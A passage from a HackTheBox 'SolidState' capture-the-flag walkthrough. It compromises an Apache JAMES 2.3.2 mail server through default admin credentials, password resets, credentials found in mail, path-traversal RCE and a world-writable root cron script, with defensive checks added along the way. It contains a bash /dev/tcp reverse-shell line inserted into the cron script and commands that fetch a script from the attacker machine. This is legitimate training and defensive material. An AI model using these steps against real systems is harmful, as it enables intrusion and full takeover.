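user: thomas
user: john
user: mindy
user: mailadmin
"""

if __name__ == "__main__":
    bad = "../../../../../../../../etc/bash_completion.d"
    print("unchecked:", mailbox_path_unchecked(MAIL_ROOT, bad))   # /etc/bash_completion.d
    print("confined ok:", username_is_safe(MAIL_ROOT, "thomas"), "bad:", username_is_safe(MAIL_ROOT, bad))
    print("suspicious:", suspicious_accounts(SAMPLE_LISTUSERS))
```

The unchecked join normalises the traversal name to `/etc/bash_completion.d`, which is exactly why the exploit picked a directory whose contents get sourced on login; the confined version refuses the name before any path is touched, and the `listusers` check is the kind of thing to run after a suspected compromise of the admin port.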


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

JAMES Remote Administration Tool 2.3.2

Please enter your login and password

Login id:

root

Password:

root

Welcome root. HELP for a list of commands

setpassword thomas letmein

Password for thomas reset



OK, now let’s see if we can use POP3 similar to SMTP, and log in as thomas over telnet.


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 110

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

USER thomas

+OK

PASS letmein

+OK Welcome thomas

Awesome, it worked, we’re connected as Thomas. Still no shell on netcat. Maybe the RCE payload will fire on a login to the server itself, such as over SSH; that would make more sense. Let’s see if we can read some emails, if there are any, to find further clues, maybe a hint on how to log in to the server. Changing Thomas’s password only changed it for the POP3 service, not the server itself, so we’ll need different creds if we’re going to SSH. Using the LIST command in POP3, it looks like Thomas has no emails:


Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

USER thomas

+OK

PASS letmein

+OK Welcome thomas

LIST

+OK 0 0

.



Let’s go through each user and reset their password, like above, log in, and see if we can find anything; if not, we’ll have to try a different avenue.

After resetting john’s password, and logging in to his mailbox, we see a promising clue:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 110

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

user john

+OK

pass letmein

+OK Welcome john

list

+OK 1 743

1 743

.

RETR 1

+OK Message follows

Return-Path: <mailadmin@localhost>

Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

Content-Transfer-Encoding: 7bit

Delivered-To: john@localhost

Received: from 192.168.11.142 ([192.168.11.142])

          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581

          for <john@localhost>;

          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)

Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)

From: mailadmin@localhost

Subject: New Hires access

John, 



Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.



Thank you in advance.



Respectfully,

James



.



Great, so maybe Mindy will have access to the server; if we can ssh as her, hopefully the exploit will fire off and give us a shell on the box. Let’s go ahead and reset her POP3 credentials, and see if there are any emails in her account:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

JAMES Remote Administration Tool 2.3.2

Please enter your login and password

Login id:

root

Password:

root

Welcome root. HELP for a list of commands

setpassword mindy getmeashell

Password for mindy reset

^]

telnet> Connection closed.

root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 110

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

user mindy

+OK

pass getmeashell

+OK Welcome mindy

list

+OK 2 1945

1 1109

2 836

.

RETR 1

+OK Message follows

Return-Path: <mailadmin@localhost>

Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

Content-Transfer-Encoding: 7bit

Delivered-To: mindy@localhost

Received: from 192.168.11.142 ([192.168.11.142])

          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798

          for <mindy@localhost>;

          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)

Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)

From: mailadmin@localhost

Subject: Welcome



Dear Mindy,

Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.



We are looking forward to you joining our team and your success at Solid State Security. 



Respectfully,

James

.

RETR 2

+OK Message follows

Return-Path: <mailadmin@localhost>

Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

Content-Transfer-Encoding: 7bit

Delivered-To: mindy@localhost

Received: from 192.168.11.142 ([192.168.11.142])

          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581

          for <mindy@localhost>;

          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)

Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)

From: mailadmin@localhost

Subject: Your Access



Dear Mindy,





Here are your ssh credentials to access the system. Remember to reset your password after your first login. 

Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 



username: mindy

pass: P@55W0rd1!2@



Respectfully,

James



.



^]

telnet> Connection closed.

Awesome, looks like we have some credentials that might work. Let’s try ssh’ing into the box as mindy with the creds mindy / P@55W0rd1!2@. If this works, our access as Mindy will likely be limited, as the email said, so let’s hope the James RCE exploit fires off the payload and gives us a less restrictive shell.

Let’s check it out.

 

gaining a foothold

 

getting a user shell

Let’s try logging in as Mindy on ssh:


root@kali:/writeups/HTB/solidstate/exploits# ssh mindy@10.10.10.51

mindy@10.10.10.51's password: 

Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686



The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.



Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142

-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found

-rbash: L: command not found

-rbash: attributestLjava/util/HashMap: No such file or directory

-rbash: L

         errorMessagetLjava/lang/String: No such file or directory

-rbash: L

         lastUpdatedtLjava/util/Date: No such file or directory

-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory

-rbash: $'L\004nameq~\002L': command not found

-rbash: recipientstLjava/util/Collection: No such file or directory

-rbash: L: command not found

-rbash: $'remoteAddrq~\002L': command not found

-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory

-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found

-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found

-rbash: @team.pl>

Message-ID: <11099374.0.1580672353999.JavaMail.root@solidstate>

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

Content-Transfer-Encoding: 7bit

Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost

Received: from 10.10.14.50 ([10.10.14.50])

          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 97

          for <../../../../../../../../etc/bash_completion.d@localhost>;

          Sun, 2 Feb 2020 14:39:13 -0500 (EST)

Date: Sun, 2 Feb 2020 14:39:13 -0500 (EST)

From: team@team.pl



: No such file or directory

-rbash: $'\r': command not found



Awesome, looks like it worked.

Checking our netcat listener to see if we got another shell, it looks like we did:


root@kali:~# nc -lvnp 43110

listening on [any] 43110 ...

connect to [10.10.14.50] from (UNKNOWN) [10.10.10.51] 59974

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ pwd

/home/mindy

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -al

total 28

drwxr-x--- 4 mindy mindy 4096 Sep  8  2017 .

drwxr-xr-x 4 root  root  4096 Aug 22  2017 ..

-rw-r--r-- 1 root  root     0 Aug 22  2017 .bash_history

-rw-r--r-- 1 root  root     0 Aug 22  2017 .bash_logout

-rw-r--r-- 1 root  root   338 Aug 22  2017 .bash_profile

-rw-r--r-- 1 root  root  1001 Aug 22  2017 .bashrc

drwxr-x--- 2 mindy mindy 4096 Aug 22  2017 bin

-rw------- 1 root  root     0 Aug 22  2017 .rhosts

-rw------- 1 root  root     0 Aug 22  2017 .shosts

drw------- 2 root  root  4096 Aug 22  2017 .ssh

-rw------- 1 mindy mindy   33 Sep  8  2017 user.txt

Awesome, looks like we can go ahead and grab the user flag.


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt

w00tw00tgetr00t         #get your own flag ;)
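The login above worked because JAMES built the recipient’s mailbox directory straight from the username, so a user named ../../../../../../../../etc/bash_completion.d had its mail file dropped where bash sources it at login (the Delivered-To header in the rbash noise shows exactly that path). As an added example, not code from the writeup or from JAMES, here is the containment check the server should have applied to mailbox names, plus a small detector over Delivered-To headers; MAIL_ROOT and the sample headers are assumed/constructed.

```python
import posixpath

# Assumed example mail root; not JAMES' real on-disk layout.
MAIL_ROOT = "/var/mail/james/inboxes"


class UnsafeMailboxName(ValueError):
    """Raised when a recipient would map to a directory outside the mail root."""


def local_part(recipient):
    """'john@localhost' -> 'john'; recipients on this box take that form."""
    return recipient.split("@", 1)[0]


def mailbox_dir(mail_root, recipient):
    """Return the inbox directory for recipient, refusing anything that
    escapes mail_root. Two independent checks: a syntactic one on the
    name itself and a structural one on the resolved path."""
    name = local_part(recipient)
    if not name or name in (".", "..") or "/" in name or "\\" in name:
        raise UnsafeMailboxName("illegal mailbox name: %r" % name)
    root = posixpath.normpath(mail_root)
    candidate = posixpath.normpath(posixpath.join(root, name))
    # Even if the syntactic check were bypassed, the result must stay under root.
    if posixpath.commonpath([root, candidate]) != root:
        raise UnsafeMailboxName("path escapes mail root: %r" % candidate)
    return candidate


def is_traversal_recipient(recipient):
    """Detection helper: True when a recipient value would be rejected by
    mailbox_dir. Usable over SMTP logs or message headers."""
    try:
        mailbox_dir(MAIL_ROOT, recipient)
    except UnsafeMailboxName:
        return True
    return False


# Constructed header lines, modelled on the ones captured in the writeup.
SAMPLE_HEADERS = [
    "Delivered-To: john@localhost",
    "Delivered-To: mindy@localhost",
    "Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost",
]


def flag_headers(headers):
    """Return the recipients from Delivered-To headers that look like traversal."""
    hits = []
    for line in headers:
        if line.lower().startswith("delivered-to:"):
            rcpt = line.split(":", 1)[1].strip()
            if is_traversal_recipient(rcpt):
                hits.append(rcpt)
    return hits


if __name__ == "__main__":
    for r in flag_headers(SAMPLE_HEADERS):
        print("traversal attempt in recipient:", r)
```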

 

Privilege Escalation

Let’s use the Linux Smart Enumeration script to automate some of the privesc enumeration legwork. You can find the script on github (and it’s linked on a few previous posts) if you don’t have it. Let’s go ahead and serve it over SimpleHTTP from our kali box, then see if we can wget the file on the target system.


root@kali:~# cd /recon/linux-smart-enumeration/

root@kali:/recon/linux-smart-enumeration# python -m SimpleHTTPServer 8080

Serving HTTP on 0.0.0.0 port 8080 ...



Then from the target system:


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ which wget

which wget

/usr/bin/wget

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget http://10.10.14.50:8080/lse.sh

wget http://10.10.14.50:8080/lse.sh

--2020-02-02 16:09:35--  http://10.10.14.50:8080/lse.sh

Connecting to 10.10.14.50:8080... connected.

HTTP request sent, awaiting response... 200 OK

Length: 34316 (34K) [text/x-sh]

Saving to: ‘lse.sh’



     0K .......... .......... .......... ...                  100%  691K=0.05s



2020-02-02 16:09:35 (691 KB/s) - ‘lse.sh’ saved [34316/34316]



${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x lse.sh

chmod +x lse.sh

Now let’s give it a run:


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./lse.sh  

./lse.sh

---

If you know the current user password, write it here for better results: P@55W0rd1!2@                            

---

                                                                                                                 

 LSE Version: 1.16                                                                                               



        User: mindy

     User ID: 1001

    Password: ******

        Home: /home/mindy

        Path: /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

       umask: 0022



    Hostname: solidstate

       Linux: 4.9.0-3-686-pae

Distribution: Debian GNU/Linux 9.0 (stretch)

Architecture: i686



==================================================================( users )=====

[i] usr000 Current user groups............................................. yes!

[*] usr010 Is current user in an administrative group?..................... nope

[*] usr020 Are there other users in an administrative groups?.............. nope

[*] usr030 Other users with shell.......................................... yes!

[i] usr040 Environment information......................................... skip

[i] usr050 Groups for other users.......................................... skip                                 

[i] usr060 Other users..................................................... skip                                 

[*] usr070 PATH variables defined inside /etc.............................. yes!                                 

[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope

===================================================================( sudo )=====

[!] sud000 Can we sudo without a password?................................. nope

[!] sud010 Can we list sudo commands without a password?................... nope

[!] sud020 Can we sudo with a password?.................................... nope

[!] sud030 Can we list sudo commands with a password?...................... nope

[*] sud040 Can we read /etc/sudoers?....................................... nope

[*] sud050 Do we know if any other users used sudo?........................ nope

============================================================( file system )=====

[*] fst000 Writable files outside user's home.............................. yes!

[*] fst010 Binaries with setuid bit........................................ yes!

[!] fst020 Uncommon setuid binaries........................................ nope

[!] fst030 Can we write to any setuid binary?.............................. nope

[*] fst040 Binaries with setgid bit........................................ skip

[!] fst050 Uncommon setgid binaries........................................ skip                                 

[!] fst060 Can we write to any setgid binary?.............................. skip                                 

[*] fst070 Can we read /root?.............................................. nope                                 

[*] fst080 Can we read subdirectories under /home?......................... yes!

[*] fst090 SSH files in home directories................................... nope

[*] fst100 Useful binaries................................................. yes!

[*] fst110 Other interesting files in home directories..................... nope

[!] fst120 Are there any credentials in fstab/mtab?........................ nope

[*] fst130 Does 'mindy' have mail?......................................... nope

[!] fst140 Can we access other users mail?................................. nope

[*] fst150 Looking for GIT/SVN repositories................................ nope

[!] fst160 Can we write to critical files?................................. nope

[!] fst170 Can we write to critical directories?........................... nope

[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope

[i] fst500 Files owned by user 'mindy'..................................... skip

[i] fst510 SSH files anywhere.............................................. skip                                 

[i] fst520 Check hosts.equiv file and its contents......................... skip                                 

[i] fst530 List NFS server shares.......................................... skip                                 

[i] fst540 Dump fstab file................................................. skip                                 

=================================================================( system )=====                                 

[i] sys000 Who is logged in................................................ skip

[i] sys010 Last logged in users............................................ skip                                 

[!] sys020 Does the /etc/passwd have hashes?............................... nope                                 

[!] sys030 Can we read /etc/shadow file?................................... nope

[!] sys030 Can we read /etc/shadow- file?.................................. nope

[!] sys030 Can we read /etc/shadow~ file?.................................. nope

[!] sys030 Can we read /etc/master.passwd file?............................ nope

[*] sys040 Check for other superuser accounts.............................. nope

[*] sys050 Can root user log in via SSH?................................... yes!

[i] sys060 List available shells........................................... skip

[i] sys070 System umask in /etc/login.defs................................. skip                                 

[i] sys080 System password policies in /etc/login.defs..................... skip                                 

===============================================================( security )=====                                 

[*] sec000 Is SELinux present?............................................. nope

[*] sec010 List files with capabilities.................................... yes!

[!] sec020 Can we write to a binary with caps?............................. nope

[!] sec030 Do we have all caps in any binary?.............................. nope

[*] sec040 Users with associated capabilities.............................. nope

[!] sec050 Does current user have capabilities?............................ skip

========================================================( recurrent tasks )=====                                 

[*] ret000 User crontab.................................................... nope

[!] ret010 Cron tasks writable by user..................................... nope

[*] ret020 Cron jobs....................................................... yes!

[*] ret030 Can we read user crontabs....................................... nope

[*] ret040 Can we list other user cron tasks?.............................. nope

[*] ret050 Can we write to any paths present in cron jobs.................. yes!

[!] ret060 Can we write to executable paths present in cron jobs........... nope

[i] ret400 Cron files...................................................... skip

[*] ret500 User systemd timers............................................. nope                                 

[!] ret510 Can we write in any system timer?............................... nope

[i] ret900 Systemd timers.................................................. skip

================================================================( network )=====                                 

[*] net000 Services listening only on localhost............................ yes!

[!] net010 Can we sniff traffic with tcpdump?.............................. nope

[i] net500 NIC and IP information.......................................... skip

[i] net510 Routing table................................................... skip                                 

[i] net520 ARP table....................................................... skip                                 

[i] net530 Namerservers.................................................... skip                                 

[i] net540 Systemd Nameservers............................................. skip                                 

[i] net550 Listening TCP................................................... skip                                 

[i] net560 Listening UDP................................................... skip                                 

===============================================================( services )=====                                 

[!] srv000 Can we write in service files?.................................. nope

[!] srv010 Can we write in binaries executed by services?.................. nope

[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope

[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope

[*] srv040 Upstart files not belonging to root............................. nope

[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope

[i] srv400 Contents of /etc/inetd.conf..................................... skip

[i] srv410 Contents of /etc/xinetd.conf.................................... skip                                 

[i] srv420 List /etc/xinetd.d if used...................................... skip                                 

[i] srv430 List /etc/init.d/ permissions................................... skip                                 

[i] srv440 List /etc/rc.d/init.d permissions............................... skip                                 

[i] srv450 List /usr/local/etc/rc.d permissions............................ skip                                 

[i] srv460 List /etc/init/ permissions..................................... skip                                 

[!] srv500 Can we write in systemd service files?.......................... nope                                 

[!] srv510 Can we write in binaries executed by systemd services?.......... nope

[*] srv520 Systemd files not belonging to root............................. nope

[i] srv900 Systemd config files permissions................................ skip

==============================================================( processes )=====                                 

[!] pro000 Can we write in any process binary?............................. nope

[*] pro010 Processes running with root permissions......................... yes!

[i] pro500 Running processes............................................... skip

[i] pro510 Running process binaries and permissions........................ skip                                 

===============================================================( software )=====                                 

[!] sof000 Can we connect to MySQL with root/root credentials?............. nope

[!] sof010 Can we connect to MySQL as root without password?............... nope

[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope

[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope

[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope

[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope

[*] sof030 Installed apache modules........................................ yes!

[!] sof040 Found any .htpasswd files?...................................... nope

[i] sof500 Sudo version.................................................... skip

[i] sof510 MySQL version................................................... skip                                 

[i] sof520 Postgres version................................................ skip                                 

[i] sof530 Apache version.................................................. skip                                 

=============================================================( containers )=====                                 

[*] ctn000 Are we in a docker container?................................... nope

[*] ctn010 Is docker available?............................................ nope

[!] ctn020 Is the user a member of the 'docker' group?..................... nope

[*] ctn200 Are we in a lxc container?...................................... nope

[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope



==================================( FINISHED )==================================

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 



So there’s a bit to unpack here. It looks like cron jobs might run a script, but we have no visibility into jobs that are not mindy’s, and she does not appear to have any. The script does mention that we can write to paths used by cron jobs, so that could be interesting; however, we’d need to know what path we’re looking for. Let’s see what world-writable files exist outside of mindy’s home directory. A run of find / -type f -perm -2 2>/dev/null yields a lot of results under /proc, which likely isn’t very helpful, so let’s filter those out and run it again:


find / -type f -perm -2 2>/dev/null | grep -v proc

/opt/tmp.py

/sys/fs/cgroup/memory/cgroup.event_control

Let’s check out tmp.py real quick, to see if there’s anything useful there.


${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls -ltr /opt/tmp.py

ls -ltr /opt/tmp.py

-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

It’s world-writable and executable, so that’s good. Python also appears to be on the server, which we can confirm with:


${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ which python

which python

/usr/bin/python

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ python -V

python -V

Python 2.7.13

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ 

OK, so in theory we should be able to write to and run this file. It’s owned by root, but if we put a reverse shell inside the python script and ran it ourselves, it would likely just give us the same user shell back, as it doesn’t have a setuid bit set for privileged execution, and we don’t have sudo installed on the system.

Let’s check the file out further, first:


${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cat /opt/tmp.py

cat /opt/tmp.py

#!/usr/bin/env python

import os

import sys

try:

     os.system('rm -r /tmp/* ')

except:

     sys.exit()



Interesting, it looks like the script is removing everything from /tmp. This seems like something you would run as a cron job if you wanted to clean /tmp every so often; the script doesn’t have a timer function itself. It is possible, however, that it is only run ad-hoc. We can test this by creating a file in /tmp (as it’s world-writeable) and seeing if it gets removed.

Let’s try this:


touch /tmp/cron_test.dat && ls -ltr /tmp && sleep 60 && ls -ltr /tmp

We may have to adjust the sleep time to be longer than a minute, maybe 3, 5, or 30 minutes, or even an hour. Let’s see first, however, if any cron jobs are running every minute:


touch /tmp/cron_test.dat && ls -ltr /tmp && sleep 60 && ls -ltr /tmp

total 0

-rw-r--r-- 1 mindy mindy 0 Feb  2 16:35 cron_test.dat

total 0

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ 

After a minute, the script wakes up from sleep, runs the directory listing again, and what do you know, no files in /tmp anymore!

 

gaining a root shell

OK, so now we know there’s a cron job running on the system every minute executing /opt/tmp.py. While we know the file is owned by root, we’re not 100% sure whether it is being executed by root (vs. another account on the system running the cron job), but let’s go ahead and add a statement to the python file to spawn another reverse shell and see. So let’s edit the python script to look like this:


#!/usr/bin/env python

import os

import sys

try:

    os.system('rm -r /tmp/* ')



    os.system('bash -c "bash -i >& /dev/tcp/10.10.14.50/1234 0>&1"')

except:

     sys.exit()



OK, let’s start another listener locally on kali with nc -lvnp 1234 and see if the reverse shell catches:


root@kali:/writeups/HTB/solidstate/exploits# nc -lvnp 1234

listening on [any] 1234 ...

connect to [10.10.14.50] from (UNKNOWN) [10.10.10.51] 55726

bash: cannot set terminal process group (5618): Inappropriate ioctl for device

bash: no job control in this shell

root@solidstate:~# 

After a moment, looks like we got a root shell, awesome! So this confirms the cron job was indeed running as root.

We can go ahead and grab the root flag and call it a day.


root@solidstate:~# id && date && ls -ltr

id && date && ls -ltr

uid=0(root) gid=0(root) groups=0(root)

Sun Feb  2 16:55:19 EST 2020

total 4

-rw------- 1 root root 33 Aug 22  2017 root.txt

root@solidstate:~# cat root.txt

cat root.txt

{thisflagsminemeow}

 

 

Conclusion

 

  • The James Remote Administration service credentials should be changed from their defaults to something more secure

  • The James Remote Administration service should be patched to mitigate known exploits for that version of the service

  • Passwords for users should be given out-of-band (not email, maybe in-person, or another medium), if possible. The system should also be configured to immediately prompt the user to change their password on first login.

  • File permissions and cron job permissions should be assessed and addressed as needed. A possible solution would be to restrict permissions on the file executed by the cron job; if it really needs to be run as root, it is probably best to chmod 700 the python script, so that an outside user has neither visibility into what the file is doing nor the ability to edit it.
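To check a host for the exact weakness abused here (a root cron job executing a script that a non-root user can edit), here is an added audit script, not from the writeup or from LSE. The crontab text, the stat results and the path /home/mindy/bin/sync.sh are constructed samples modelled on what the box showed; real_stat reads the live filesystem when you point audit_crontab at a real /etc/crontab.

```python
import os
import re
import stat

# Constructed /etc/crontab-style sample. The writeup never shows the real
# SolidState crontab, only that /opt/tmp.py runs every minute as root.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   root    /usr/bin/python /opt/tmp.py
*/5 *   * * *   mindy   /home/mindy/bin/sync.sh
"""

# Constructed stat results keyed by path: (owner uid, permission bits).
# /opt/tmp.py mirrors the -rwxrwxrwx root-owned file found on the box.
SAMPLE_STAT = {
    "/usr/bin/python": (0, 0o755),
    "/opt/tmp.py": (0, 0o777),
    "/home/mindy/bin/sync.sh": (1001, 0o750),
}

# Five schedule fields (or an @keyword), then the user, then the command.
CRON_LINE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})(\S+)\s+(.+)$")
# Absolute paths inside the command string, split on shell separators.
PATH_TOKEN = re.compile(r"(?<!\S)/[^\s;&|]*")


def parse_crontab(text):
    """Return (user, command) for each job line; skip comments and VAR=... lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group(1), m.group(2)))
    return jobs


def sample_stat(path):
    """Offline lookup against the constructed SAMPLE_STAT table."""
    return SAMPLE_STAT.get(path)


def real_stat(path):
    """Live lookup: (uid, mode) or None when the path does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, stat.S_IMODE(st.st_mode)


def audit_crontab(text, stat_fn=real_stat):
    """Flag every path referenced by a root job that a non-root user could modify."""
    findings = []
    for user, command in parse_crontab(text):
        if user != "root":
            continue  # only root jobs hand out a full privilege jump
        for path in PATH_TOKEN.findall(command):
            info = stat_fn(path)
            if info is None:
                continue  # unknown path; nothing to check offline
            uid, mode = info
            reasons = []
            if uid != 0:
                reasons.append("owned by uid %d, not root" % uid)
            if mode & stat.S_IWOTH:
                reasons.append("world-writable")
            elif mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if reasons:
                findings.append({"path": path, "command": command,
                                 "mode": oct(mode), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, sample_stat):
        print("%s (%s): %s" % (f["path"], f["mode"], ", ".join(f["reasons"])))
```

On a live host, pass the contents of /etc/crontab (and each file in /etc/cron.d, which uses the same user-field format) and leave stat_fn at its default.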

 

Personal takeaways

  • get more comfortable reading and understanding exploits. If there is some confusion on what the exploit is actually doing, I should take more time to understand what it’s trying to do and how it behaves, before jumping to trying to get the exploit to trigger

 

 

All for now; until next time.

~@initinfosec

hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep